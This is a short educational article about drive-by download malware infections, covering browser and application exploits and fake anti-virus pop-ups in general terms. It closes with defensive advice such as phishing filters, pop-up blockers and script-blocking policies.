Links
Malware Infection Methods: Drive-by Downloads
Now that the Internet has been around for some time, users are starting to become more adept at protecting themselves from Web-based threats. Users have learned that certain parts of the Web or Web pages, like advertisements, can pose a security threat and, therefore, will avoid clicking on them. Unfortunately, the malware writers have also noticed the trend and continue to come up with new ways of distributing their malicious applications. The most popular method used for the past year is called Drive-by Downloads. The term Drive-by Download means users become infected simply by surfing an exploited Web page and are completely unaware of the malicious file download occurring in the background. Web browser exploits (such as IE, Firefox, Safari, etc.) and other third party application exploits (such as Adobe Reader, Microsoft Excel, etc.) can potentially allow remote code execution, which can lead to a malicious file download which is completely invisible to the user. Fake pop-ups that look legitimate, often cleverly masqueraded as anti-virus solutions, are also a popular method of tricking a user into either clicking on the pop-up to close it or following the instructions on the pop-up, both of which result in malicious file downloads.
Browser and third party application exploits are quite similar in that an inherent flaw in the browser or application allows malware writers the ability to execute code on the unsuspecting user. The code that is actually executed can vary based upon the exploit package initially downloaded. Most exploit code will install a file dropper of some sort that will continue to deliver malicious applications over time. Other malicious files downloaded can also record the user’s keystrokes, enabling the stealing of passwords and banking login information, or allowing installation of software that will add the user’s PC to a larger herd of bots used for spamming or other malicious deeds.
Fake anti-virus pop-up alerts have also become a very popular infection method. Malware writers can inject code into a Web page that will pop-up a legitimate looking alert, notifying the user that they have a virus infection. Users will often be fooled by the bogus alert and become infected by accepting the download and installing the fake anti-virus software. The fake anti-virus software can then begin to install or download different types of malware ranging from Trojans to ransomware.
So how does one protect his network from Drive-by Downloads? Unfortunately, there is no bullet-proof solution as 0-day exploits (exploits so new that a patch is not yet available) will always be a threat in the third party software we use daily. One can, however, protect his network by practicing safe browsing habits and educating other users about Drive-by Downloads and other infection methods. Many newer browser versions will include a “phishing filter” which warns users of dangerous sites. While this filter relies on constant updates of the Dangerous Site List, it is still recommended and can be a great initial filter. Pop-up blockers should always remain on and pop-ups should only be allowed after user intervention. While users might still allow malicious pop-ups by accident, this action will prevent the automatic opening of the pop-ups. More technical users or administrators can also take steps to prevent the running of scripting languages, like JavaScript or ActiveX, through policy definition. While this act can prevent access to legitimate sites, whitelists can always be created to allow access to necessary sites.
Reference Links:
- Spyware Warrior – (http://www.spywarewarrior.com/uiuc/dbd-anatomy.htm)
- CNet – (http://news.cnet.com/2100-1023-877568.html)